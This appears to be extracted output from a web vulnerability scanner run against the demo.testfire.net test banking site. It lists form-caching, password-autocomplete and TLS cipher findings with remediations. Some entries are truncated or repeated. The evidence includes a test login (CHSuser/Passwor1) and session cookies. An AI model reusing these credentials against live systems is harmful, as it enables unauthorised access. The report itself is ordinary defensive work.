Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://65.61.137.117:8080/index.jsp?content=business.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://65.61.137.117/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://65.61.137.117:8080/index.jsp?content=personal.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET -
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://65.61.137.117:8443/index.jsp?content=personal.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://65.61.137.117:8080/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://demo.testfire.net/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET -
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://65.61.137.117:8443/index.jsp?content=business.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.biz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net:8443/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.biz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/index.jsp
No Caching Directives Found.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.biz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
forms Data submitted via forms present on pages without caching directives
can be cached on the browser/cache, giving access to the
data.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://65.61.137.117/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://demo.testfire.net:8443/index.jsp?content=business.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Request: GET
https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://demo.testfire.net/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://65.61.137.117/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.biz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.
Evidence:
Form Name: login
Action: https://65.61.137.117:443/doLogin
Fields: passw (password)
Location: https://65.61.137.117/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
Evidence:
Form Name: login
Action: http://65.61.137.117:80/doLogin
Fields: passw (password)
Location: http://65.61.137.117/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
Evidence:
Form Name: login
Action: https://demo.testfire.net:8443/doLogin
Fields: passw (password)
Location: https://demo.testfire.net:8443/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Form Name: login
Action: http://demo.testfire.net:80/doLogin
Fields: passw (password)
Location: http://demo.testfire.net/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletion
Evidence:
Form Name: login
Action: http://65.61.137.117:8080/doLogin
Fields: passw (password)
Location: http://65.61.137.117:8080/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Service: http
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletion
Evidence:
Form Name: login
Action: http://demo.testfire.net:8080/doLogin
Fields: passw (password)
Location: http://demo.testfire.net:8080/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
CVSSv2: AV:L/AC:H/Au:N/C:P/I:N/A:N
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletion
Evidence:
Form Name: login
Action: https://demo.testfire.net:443/doLogin
Fields: passw (password)
Location: https://demo.testfire.net/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
The web server running on this host uses password fields that allow
auto-completion by users' browsers. This could allow a user's
credentials to be stored by the browser and subsequently exposed if
the user's computer becomes compromised.
Reference:
http://msdn.microsoft.com/en-us/library/ms533032.aspx
https://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletion
Evidence:
Form Name: login
Action: https://65.61.137.117:8443/doLogin
Fields: passw (password)
Location: https://65.61.137.117:8443/login.jsp
Remediation:
Modify the identified page so that the password field and the enclosing
form tags have an attribute named "autocomplete" with a value of
"off".
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat, apache:tomcat
Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: http
ip_address: 65.61.137.117
port_number: 80
transport_protocol: tcp
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
http://www.openssl.org/docs/apps/ciphers.html
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
